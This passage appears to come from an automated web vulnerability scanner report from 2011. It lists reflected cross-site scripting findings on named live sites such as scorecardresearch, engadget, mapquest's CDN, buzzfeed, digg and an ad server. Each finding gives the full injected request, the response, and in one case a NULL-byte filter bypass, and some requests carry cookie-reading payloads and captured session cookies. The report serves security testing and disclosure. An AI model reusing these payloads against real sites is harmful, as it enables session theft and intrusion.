JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3e4b0<script>alert(1)</script>3fe39883e3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=83e4b0<script>alert(1)</script>3fe39883e3&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:36:59 GMT Date: Sun, 06 Feb 2011 20:36:59 GMT Connection: close Content-Length: 3608
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 3ded5<script>alert(1)</script>e6bec28e3dd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=3ded5<script>alert(1)</script>e6bec28e3dd&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:01 GMT Date: Sun, 06 Feb 2011 20:37:01 GMT Connection: close Content-Length: 3609
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 60671<script>alert(1)</script>5eb3a0cba51 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15=60671<script>alert(1)</script>5eb3a0cba51 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:02 GMT Date: Sun, 06 Feb 2011 20:37:02 GMT Connection: close Content-Length: 3609
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload d53a2<script>alert(1)</script>9cc82d916a8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693d53a2<script>alert(1)</script>9cc82d916a8&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:00 GMT Date: Sun, 06 Feb 2011 20:37:00 GMT Connection: close Content-Length: 3609
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 68b81<script>alert(1)</script>efcbb2330ca was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=168b81<script>alert(1)</script>efcbb2330ca&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:00 GMT Date: Sun, 06 Feb 2011 20:37:00 GMT Connection: close Content-Length: 3609
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 19807<script>alert(1)</script>acb3208d838 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F19807<script>alert(1)</script>acb3208d838&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:00 GMT Date: Sun, 06 Feb 2011 20:37:00 GMT Connection: close Content-Length: 3609
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7f924<script>alert(1)</script>327a9db5a54 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=7f924<script>alert(1)</script>327a9db5a54&c6=&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:01 GMT Date: Sun, 06 Feb 2011 20:37:01 GMT Connection: close Content-Length: 3609
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 3ca5d<script>alert(1)</script>9482817c403 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=3ca5d<script>alert(1)</script>9482817c403&c10=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 13 Feb 2011 20:37:01 GMT Date: Sun, 06 Feb 2011 20:37:01 GMT Connection: close Content-Length: 3609
1.69. http://chinese.engadget.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://chinese.engadget.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cbb5"-alert(1)-"5dc800f9cb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2cbb5"-alert(1)-"5dc800f9cb0=1 HTTP/1.1 Host: chinese.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)docume ...[SNIP]...
1.70. http://cn.engadget.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cn.engadget.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8582e"-alert(1)-"5a7ac817e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8582e"-alert(1)-"5a7ac817e08=1 HTTP/1.1 Host: cn.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d259<script>alert(1)</script>3ed25b9c15a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage8d259<script>alert(1)</script>3ed25b9c15a?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Referer: http://www.mapquest.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:49:51 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2 Connection: close Content-Type: text/html Content-Length: 247
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /coverage8d259<script>alert(1)</script>3ed25b9c15a was not found on this server.</p> ...[SNIP]...
The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload 70953<script>alert(1)</script>a0406af2794 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat70953<script>alert(1)</script>a0406af2794 HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Referer: http://www.mapquest.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 BAD REQUEST Date: Sun, 06 Feb 2011 19:49:51 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2 Connection: close Content-Type: text/plain Content-Length: 46
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3e48a<script>alert(1)</script>1db30dff717 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage?format=json&jsonp=MQA._covCallback3e48a<script>alert(1)</script>1db30dff717&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Referer: http://www.mapquest.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:49:51 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2 Connection: close Content-Type: text/javascript Content-Length: 1129
1.74. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://coverage.mqcdn.com
Path:
/coverage
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 77427<script>alert(1)</script>26ea7b496e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat&77427<script>alert(1)</script>26ea7b496e3=1 HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Referer: http://www.mapquest.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:49:51 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2 Connection: close Content-Type: text/javascript Content-Length: 1091
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a95f9<script>alert(1)</script>13b395b7000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoa95f9<script>alert(1)</script>13b395b7000 HTTP/1.1 Host: coverage.mqcdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 20:14:35 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2 Connection: close Content-Type: text/html Content-Length: 250
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.icoa95f9<script>alert(1)</script>13b395b7000 was not found on this server.</p> ...[SNIP]...
The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 2d744<script>alert(1)</script>660425639af was submitted in the or parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wd/UserWidget?u=popeater&to=1&or=vb2d744<script>alert(1)</script>660425639af&wid=1&cb=1297025740300 HTTP/1.1 Host: ct.buzzfeed.com Proxy-Connection: keep-alive Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=ISO-8859-1 Date: Sun, 06 Feb 2011 20:54:55 GMT Server: lighttpd bf1 Content-Length: 577
bless({ "-file" => "lib/buzzfeed/wd/controller/UserWidget.pm", "-line" => 130, "-package" => "buzzfeed::wd::controller::UserWidget", "-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script>alert(1)</script>660425639af&wid=1&to=1&u=popeater - Internal Server Error", }, "Error::Simple")
unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script> ...[SNIP]...
The value of the u request parameter is copied into the HTML document as plain text between tags. The payload c17bd<script>alert(1)</script>ad8b15919de was submitted in the u parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wd/UserWidget?u=popeaterc17bd<script>alert(1)</script>ad8b15919de&to=1&or=vb&wid=1&cb=1297025740300 HTTP/1.1 Host: ct.buzzfeed.com Proxy-Connection: keep-alive Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=ISO-8859-1 Date: Sun, 06 Feb 2011 20:54:54 GMT Server: lighttpd bf2 Content-Length: 577
bless({ "-file" => "lib/buzzfeed/wd/controller/UserWidget.pm", "-line" => 130, "-package" => "buzzfeed::wd::controller::UserWidget", "-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script>alert(1)</script>ad8b15919de - Internal Server Error", }, "Error::Simple")
unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d7e"><script>alert(1)</script>7af3d5b7b03 was submitted in the REST URL parameter 1. This input was echoed as 16d7e"><script>alert(1)</script>7af3d5b7b03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0016d7e"><script>alert(1)</script>7af3d5b7b03 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5623a"><script>alert(1)</script>d0b27ad4f84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM5623a"><script>alert(1)</script>d0b27ad4f84/2010DM/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://www.parentdish.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:52:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdebb"><script>alert(1)</script>b54197732d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMbdebb"><script>alert(1)</script>b54197732d3/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://www.parentdish.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:52:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803d1"><script>alert(1)</script>26ba130f8ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1117431738@x23803d1"><script>alert(1)</script>26ba130f8ba?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://www.parentdish.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:52:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c2a"><script>alert(1)</script>771ead1711a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM28c2a"><script>alert(1)</script>771ead1711a/2010DM/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
